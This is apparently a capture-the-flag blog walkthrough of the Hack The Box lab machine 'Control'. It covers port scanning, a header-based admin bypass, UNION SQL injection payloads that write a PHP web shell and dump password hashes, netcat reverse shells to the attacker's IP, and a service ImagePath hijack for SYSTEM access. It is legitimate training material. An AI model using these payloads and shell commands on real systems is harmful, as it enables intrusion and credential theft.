This post documents the complete walkthrough of Control, a retired vulnerable VM created by TRX, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Control is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.167 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-11-25 07:40:50 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.167
Discovered open port 49667/tcp on 10.10.10.167
Discovered open port 49666/tcp on 10.10.10.167
Discovered open port 3306/tcp on 10.10.10.167
Discovered open port 80/tcp on 10.10.10.167

Nothing unusual. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p80,135,3306 -A --reason -oN nmap.txt 10.10.10.167
...
PORT     STATE SERVICE REASON          VERSION
80/tcp   open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
3306/tcp open  mysql?  syn-ack ttl 127
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, LDAPSearchReq, LPDString, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, afp, giop, ms-sql-s:
|_    Host '10.10.15.82' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=11/25%Time=5DDB86B6%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPR
SF:equest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionReq,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerC
SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessio
SF:nReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFour
SF:Request,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LPDStri
SF:ng,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe
SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(ms-sql-s,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20thi
SF:s\x20MariaDB\x20server")%r(giop,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.
SF:15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Maria
SF:DB\x20server");

I’m pretty sure there’s a MySQL database service behind 3306/tcp.

That leaves us with the http service. This is how it looks like.

Oh, before I forget, the IIS is running PHP as well.

Admin Interface Bypass

There’s something interesting in the HTML source of index.php.

I’ve checked. /myfiles doesn’t exist. And also there’s this interesting message when I try to access admin.php.

I put two and two together, and made an educated guess. This is the client IP address that’s allowed to access admin.php, usually through X-Forwarded-For type of header. To facilitate that, we can make use of Burp’s Bypass WAF extension.

Set the scope to the remote machine and we are good to go.

Presto!

Taking baby steps to discover SQL Injection

It’s not long before I discovered a classic vulnerability with a single quote (') entered into the search field: SQL injection within the search_products.php page.

Usually, we have to determine the number of columns from the products table but looking at above, the number of columns should be five or six. Let’s enter the following into the search field.

' ORDER BY 7 -- -

Confirmed. The number of columns is six. Let’s enter the following into the search field.

' UNION SELECT 1,2,3,4,5,@@VERSION -- -

So, the search_products.php page is susceptible to a UNION-based SQL injection. Time to upload a simple PHP backdoor like so.

<?php echo shell_exec($_GET[0]); ?>

Enter the following into the search field.

' UNION SELECT 1,2,3,4,5,"<br><pre><?php echo htmlentities(shell_exec($_GET[0])); ?></pre>" INTO OUTFILE '\\inetpub\\wwwroot\\cmd.php' -- -

Let’s see if we can execute remote commands through PHP.

Awesome!

Low-Privilege Shell

Time to get that shell. First, let’s transfer nc.exe (from /usr/share/windows-resources/binaries/nc.exe) to a world-writable folder (like \Windows\System32\spool\drivers\color).

Let’s run the reverse shell back to us while nc listens for the incoming shell.

And we have the initial foothold.

Hector is in the Remote Management Users group

During enumeration of iusr’s account, I noticed that Hector is in the Remote Management Users group. That means his credentials must be lying somewhere…

Get that hash

To be honest, I was pleasantly surprised that I could even run the following SQLi and yielded something.

' UNION SELECT 1,2,3,4,user, password from mysql.user -- -

What do we have here? Hector’s password hash!

John the Ripper

Armed with Hector’s password hash, let’s show John the Ripper some :heart:.

Hector’s password is l33th4x0rhector.

PowerShell Remoting / WinRM

Now that we have Hector’s password, we can proceed to log in to Hector’s account via PowerShell Remoting. But first, we need to spawn a PowerShell. To do that, we can use nc.exe to spawn another reverse shell and enter into PowerShell from there.

The hostname is Fidelity by the way. That’s the only plot twist.

With that, we can execute Start-Process to call upon our nc.exe to run the third reverse shell. This time as Hector. :wink:

> Start-Process -FilePath \windows\system32\spool\drivers\color\cute.exe -ArgumentList "10.10.15.82 4444 -e cmd" -NoNewWindow

Getting user.txt

The file user.txt is at Hector’s Desktop. No surprise there.

Privilege Escalation

During enumeration of Hector’s account, I notice that Hector is able to do something special with one of the Registry keys.

I generated the above with AccessChk from Microsoft SysInternals like so.

> accesschk.exe -klr hklm\system\currentcontrolset

That means that Hector is able to change the ImagePath of any service of my choice, but which one? The service must be in a stopped state, run as LocalSystem with no dependencies and more importantly, Hector must have the permissions to start the service.

Long story short, I chose Secondary Logon service or seclogon. Here’s why.

Stopped state

Run as LocalSystem with no dependencies

Hector is able to start the service

Basically, the security descriptor string says that Hector as an Authenticated User has the Read Property (RP) of the service object, i.e. Hector can start the Secondary Logon service.

Getting root.txt

To change the ImagePath of the seclogon service, we can use the very versatile REG.EXE command.

> REG DELETE HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /f
> REG ADD HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /t REG_SZ /d "%WINDIR%\System32\cmd.exe /c start %WINDIR%\system32\spool\drivers\color\cute.exe 10.10.15.82 5555 -e cmd.exe" /f
> sc start seclogon

Time to claim the prize…

:dancer: